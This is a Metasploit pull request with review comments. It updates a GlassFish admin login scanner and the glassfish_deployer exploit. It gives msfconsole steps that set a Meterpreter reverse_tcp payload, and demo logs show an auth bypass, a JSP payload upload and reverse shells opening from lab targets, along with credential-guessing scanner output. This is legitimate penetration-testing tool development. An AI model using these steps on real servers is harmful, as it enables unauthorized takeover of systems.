### PR TITLE
GlassFish fixes (exploit & loginscanner)

### PR DESCRIPTION
**Pull request by wchen-r7**
This pull request addresses the following:
- Proper login support for GlassFish 9.x
- Proper exploit support for GlassFish 9.x, 4.x, 2.x (but covers other versions too)

See #5591
See #5558
## Setup

Since 9.1 update 2 and 2.1 are the ones being reported as broken, please test at least one of those.
- [x] Set up a Linux (Ubuntu) box
- [x] Open a terminal in Ubuntu, and do this:

```
sudo add-apt-repository ppa:webupd8team/java
sudo apt-get update
sudo apt-get install oracle-java8-installer
sudo apt-get install oracle-java8-set-default
sudo apt-get install libstdc++5
```
- [x] Download GlassFish 9.1 or 2.1 here: http://www.oracle.com/technetwork/middleware/glassfish/downloads/java-archive-downloads-glassfish-419424.html or here: https://glassfish.java.net/download-archive.html
- [x] The installer should be a bin file. You can chmod +x it, and then just run it. After the installation is done, make sure port 4848 is running, and try using a browser first and make sure you can login.

Note: If you installed GlassFish 9.1 first and then upgraded to Update 2, then remember to restart the server (or better, reboot and then start GlassFish again), otherwise you will hit some deployment issues.
## Test the login module

In msfconsole, do:
- [x] `use auxiliary/scanner/http/glassfish_login`
- [x] `set rhosts [IP]`
- [x] `set USERNAME [username]`
- [x] `set PASSWORD [password]`
- [x] `run`
- [x] If the user/pass is correct, it should say login successful.

In some GlassFish versions, you need to set SSL to true. If this is needed, it will be obvious to you.
## Test the exploit

In msfconsole, do:
- [x] `use exploit/multi/http/glassfish_deployer`
- [x] `set rhost [IP]`
- [x] `set USERNAME [user]`
- [x] `set PASSWORD [pass]`
- [x] `set target 3` (3 is Linux)
- [x] `set payload linux/x86/meterpreter/reverse_tcp`
- [x] `set lhost [Your IP]`
- [x] `run`
- [x] You should get a session like the following demos

Note that the exploit is reusing the same authentication code from the LoginScanner, so if the auth portion in the exploit works for you, the login module should work too. It's just different purposes.
## Demos

The following demonstrates the exploit has been tested on these versions: v2.1, 3.1.2.2, 4.1, 9.1_02, 4.0, 9.1 (Linux and Windows)

```
[*] Started reverse handler on 192.168.1.64:4444 
[*] Glassfish edition: Sun GlassFish Enterprise Server v2.1
[*] Trying auth bypass...
[*] Uploading payload...
[*] Successfully uploaded
[*] Executing /UBUnaAnuUBAe/Sg5EIbOwERkGVGIsG68JmG.jsp...
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495598 bytes) to 192.168.1.148
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.148:47844) at 2015-06-25 15:23:34 -0500
[*] Getting information to undeploy...
[*] Undeploying UBUnaAnuUBAe...
[*] Undeployment complete.

meterpreter >
```

```
msf exploit(glassfish_deployer) > run

[*] Started reverse handler on 192.168.1.64:4444 
[*] Glassfish edition: Sun Java System Application Server 9.1
[*] Trying auth bypass...
[*] Uploading payload...
[*] Successfully uploaded
[*] Executing /rcbwgKJSbKAblk/XUKLd2N85BJhUqNyJ5tE3mK.jsp...
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495598 bytes) to 192.168.1.151
[*] Meterpreter session 2 opened (192.168.1.64:4444 -> 192.168.1.151:58631) at 2015-06-25 15:25:23 -0500
[*] Getting information to undeploy...
[*] Undeploying rcbwgKJSbKAblk...
[*] Undeployment complete.

meterpreter >
```

```
[*] Started reverse handler on 192.168.1.64:4444 
[*] Glassfish edition: GlassFish Server Open Source Edition  4.0
[*] Trying to login as admin:veryphat
[*] Uploading payload...
[*] Successfully uploaded
[*] Executing /jfNdesXYuzbviMql/KFyuPnGfZR6JLa6VnRZ9Bv0O.jsp...
[*] Sending stage (884270 bytes) to 192.168.1.109
[*] Meterpreter session 3 opened (192.168.1.64:4444 -> 192.168.1.109:2521) at 2015-06-25 15:26:34 -0500
[*] Getting information to undeploy...
[*] Undeploying jfNdesXYuzbviMql...
[*] Undeployment complete.

meterpreter >
```

```
msf exploit(glassfish_deployer) > run

[*] Started reverse handler on 192.168.1.64:4444 
[*] Glassfish edition: Sun Java System Application Server 9.1_02
[*] Trying auth bypass...
[*] Uploading payload...
[*] Successfully uploaded
[*] Executing /Pfyy/aDHExESj9LvlG5Sm42CLEqI64CE.jsp...
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495598 bytes) to 192.168.1.151
[*] Meterpreter session 4 opened (192.168.1.64:4444 -> 192.168.1.151:57045) at 2015-06-25 16:33:42 -0500
[*] Getting information to undeploy...
[*] Undeploying Pfyy...
[*] Undeployment complete.

meterpreter > 
```

```
msf exploit(glassfish_deployer) > run

[*] Started reverse handler on 192.168.1.64:4444 
[*] Glassfish edition: GlassFish Server Open Source Edition  4.1
[*] Trying to login as admin:veryphat
[*] Uploading payload...
[*] Successfully uploaded
[*] Executing /SgtzUGZUCgQ78LhKGU4jhnJ/Xh3cUubjE5dgNJt69VioQpDigE.jsp...
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495598 bytes) to 192.168.1.177
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.177:51149) at 2015-06-25 16:59:51 -0500
[*] Getting information to undeploy...
[*] Undeploying SgtzUGZUCgQ78LhKGU4jhnJ...
[*] Undeployment complete.

meterpreter > 
```

```
msf exploit(glassfish_deployer) > run

[*] Started reverse handler on 192.168.1.64:4444 
[*] Glassfish edition: GlassFish Server Open Source Edition 3.1.2.2
[*] Trying to login as admin:veryphat
[*] Uploading payload...
[*] Successfully uploaded
[*] Executing /KRytiZ/OD3jjplAh3awz0Cg9x7.jsp...
[*] Sending stage (884270 bytes) to 192.168.1.168
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.168:49352) at 2015-06-25 23:49:29 -0500
[*] Getting information to undeploy...
[*] Undeploying KRytiZ...
[*] Undeployment complete.

meterpreter > 
```

### CODE REVIEW

**Comment by jabra-** [comment]
@wchen-r7 if the auth-bypass worked, it would just need to know the IP and port (would be nice to have the version info too).

**Comment by wchen-r7** [comment]
Yeah, I'll do that.

**Comment by jabra-** [comment]
Might be good to test it against 3.0 and 3.1+ just to be sure everything is properly working.

**Comment by wchen-r7** [comment]
@jabra- More reporting features have been added and I just posted a demo for 3.1.2.2.

**Comment by jabra-** [comment]
I suggest adding this exploit/aux scanner to a recurring test suite. As for the status of this PR, it looks great to me!

**Comment by wchen-r7** [comment]
> I suggest adding this exploit/aux scanner to a recurring test suite

Are you a Pro user? Because to me a test suite means this: https://community.rapid7.com/community/metasploit/blog/2013/07/17/security-testing-just-got-easier-metasploit-47-with-new-metamodules :-)

**Comment by wchen-r7** [comment]
@jvazquez-r7 Can I assign this pull request to you?

**Comment by jabra-** [comment]
@wchen-r7 by recurring test suite, I'm thinking like something like cucumber that would verify the results of running the exploit/aux scanner (in a lab environment).

**Comment by wchen-r7** [comment]
Ah ok. Yeah that's a good idea. We have a QE team for that and I'll forward that idea to them. Thanks!

**Comment by jvazquez-r7** [comment]
* Test the login module

```
msf auxiliary(glassfish_login) > run

[*] 172.16.158.136:4848 GLASSFISH - Checking if Glassfish requires a password...
[*] 172.16.158.136:4848 GLASSFISH - Glassfish is protected with a password
[+] 172.16.158.136:4848 GLASSFISH - Success: 'admin:admin1234'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

But I always see "Success":

```
msf auxiliary(glassfish_login) > run

[*] 172.16.158.136:4848 GLASSFISH - Checking if Glassfish requires a password...
[*] 172.16.158.136:4848 GLASSFISH - Glassfish is protected with a password
[+] 172.16.158.136:4848 GLASSFISH - Success: 'admin:123456'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

**Comment by jvazquez-r7** [comment]
Test exploit:

```
msf exploit(glassfish_deployer) > run

[*] Started reverse handler on 172.16.158.1:4444
[*] Glassfish edition: Sun Java System Application Server 9.1
[*] Trying auth bypass...
[*] Attempting to automatically select a target...
[*] Uploading payload...
[*] Successfully uploaded
[*] Executing /9ln3jX8eQD95dfXofgLPfS/oZl9xkDcAxnQ.jsp...
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495598 bytes) to 172.16.158.136
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.136:33912) at 2015-06-26 13:49:50 -0500
[*] Getting information to undeploy...
[*] Undeploying 9ln3jX8eQD95dfXofgLPfS...
[*] Undeployment complete.

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000
meterpreter > sysinfo
Computer     : ubuntu
OS           : Linux ubuntu 3.8.0-29-generic #42~precise1-Ubuntu SMP Wed Aug 14 15:31:16 UTC 2013 (i686)
Architecture : i686
Meterpreter  : x86/linux
meterpreter >
```

File: modules/exploits/multi/http/glassfish_deployer.rb [hunk 1]
```diff
@@ -4,68 +4,47 @@
...
         [
-          #Msf module for Glassfish 3.0
-          'juan vazquez',
-          #Msf module for Glassfish 3.1, 2.x and Sun Java System Application Server 9.1
-          'Joshua Abraham <jabra[at]rapid7.com>',
-          #Rewrite for 3.0, 3.1 (Commercial or Open Source)
-          'sinn3r',
+          'juan vazquez', # Msf module for Glassfish 3.0
+          'Joshua Abraham <jabra[at]rapid7.com>', # Glassfish 3.1, 2.x & Sun Java System Application Server 9.1
+          'sinn3r' # Rewrite for everything
```
Comment (jvazquez-r7) [inline modules/exploits/multi/http/glassfish_deployer.rb]: hehe "Rewrite for everything" :) I liked!

File: modules/exploits/multi/http/glassfish_deployer.rb [hunk 2]
```diff
@@ -76,27 +55,31 @@ def initialize(info={})
           OptString.new('APP_RPORT',[ true,  'The Application interface port', '8080']),
           OptString.new('USERNAME', [ false, 'The username to authenticate as','admin' ]),
           OptString.new('PASSWORD', [ false, 'The password for the specified username','' ]),
-          OptString.new('PATH', [ true,  "The URI path of the GlassFish Server", '/'])
+          OptString.new('PATH', [ true,  "The URI path of the GlassFish Server", '/']),
```
Comment (jvazquez-r7) [inline modules/exploits/multi/http/glassfish_deployer.rb]: Maybe we can use the opportunity to switch to TARGET_URI? I undrestand maybe out of scope, the PR already introducing a bunch of changes :)

**Comment by jvazquez-r7** [comment]
After the last commit the `glassfish_login` module is working as expected:

```
msf auxiliary(glassfish_login) > set password admin1234
password => admin1234
msf auxiliary(glassfish_login) > run

[*] 172.16.158.136:4848 GLASSFISH - Checking if Glassfish requires a password...
[*] 172.16.158.136:4848 GLASSFISH - Glassfish is protected with a password
[+] 172.16.158.136:4848 GLASSFISH - Success: 'admin:admin1234'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

Bad password:

```
msf auxiliary(glassfish_login) > set password admin123456
password => admin123456
msf auxiliary(glassfish_login) > run

[*] 172.16.158.136:4848 GLASSFISH - Checking if Glassfish requires a password...
[*] 172.16.158.136:4848 GLASSFISH - Glassfish is protected with a password
[-] 172.16.158.136:4848 GLASSFISH - Failed: 'admin:admin123456'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

**Comment by wchen-r7** [comment]
@jvazquez-r7 It is now using TARGETURI, you will need to pull again.

**Comment by jvazquez-r7** [comment]
ooom cool!, thanks that's great ! since it is fixing #5591 and #5558 (my 9.1 tests were successful with both modules), I'm confident about extra tests by @wchen-r7 to avoid regressions and it is making code cleanr I'm going to land it once travis is green =) It there is any objection it is the time to speak :P

**Comment by wchen-r7** [comment]
Thanks. Yeah after I made those two changes I tested on 9.1, 2.1 and 4.0 again.

**Pull request merged**